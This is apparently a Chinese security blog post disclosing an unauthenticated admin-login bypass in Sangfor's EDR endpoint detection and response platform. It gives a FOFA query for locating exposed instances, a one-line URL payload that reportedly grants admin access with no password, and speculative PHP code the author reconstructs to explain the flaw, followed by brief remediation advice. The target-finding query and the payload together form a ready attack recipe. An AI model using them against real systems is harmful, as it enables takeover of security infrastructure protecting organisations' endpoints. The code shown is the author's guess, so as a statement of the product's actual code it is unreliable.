【最新重磅】深信服 EDR终端检测响应平台-任意用户免密登录漏洞

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!

0x01 介绍

  深信服终端检测响应平台EDR，围绕终端资产安全生命周期，通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时，通过云网端联动协同、威胁情报共享、多层级响应机制，帮助用户快速处置终端安全问题，构建轻量级、智能化、响应快的下一代终端安全系统。

0x02 fofa：

title=“SANGFOR终端检测响应平台”

0x03 payload:

https://ip/ui/login.php?user=admin
回车直接进入管理后台！！！

0x04 测试图：

0x05 猜测代码：

  以下代码是根据其最近HW队爆出RCE漏洞代码及本次任意用户登录漏洞逻辑推断（可以看我的另一篇博客深信服RCE漏洞）。

if((isset($_SERVER["REMOTE_ADDR"]) && ("127.0.0.2" == $_SERVER["REMOTE_ADDR"] || "127.0.0.1" == $_SERVER["REMOTE_ADDR"]))
            || $docker)
        {
     
            //构造session
            if(isset($_GET["user"]))
            {
     
                $auth_value["auth_user"] = $_GET["user"];
            }
            elseif($docker)
            {
     
                $auth_value["auth_user"] = $username;
            }
            else
            {
     
                //$auth_value["auth_user"] = "SCLOUDE";
                //免密登录后，人为loginout，还是需要密码登录，url不一样
                return;
            }

在if判断中，首先判断了$_SERVER[“REMOTE_ADDR”]是否存在且为127.0.0.2

然后判断了是否等于127.0.0.1 以及$docker

因为exp执行可跳转进入后台，这里判断为真，我们搜索127.0.0.0和127.0.0.1进行定位

搜索到127.0.0.1并定位到c.php ， 这好像是之前命令执行RCE的文件

也就是说在这里开发不仅仅出现了变量覆盖漏洞，同时在这里默认定义了所属IP为127.0.0.1

由命令执行RCE同时触发了任意用户登陆漏洞

0x05 建议：

1、做好代码审查，又又又遇到extract()函数重写变量的问题；
2、我怎么就这么轻松进入管理平台了呢？EDR管理平台访问ip做ACL限制。
3、代码给我看傻了，提不了别的意见，我不配~

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!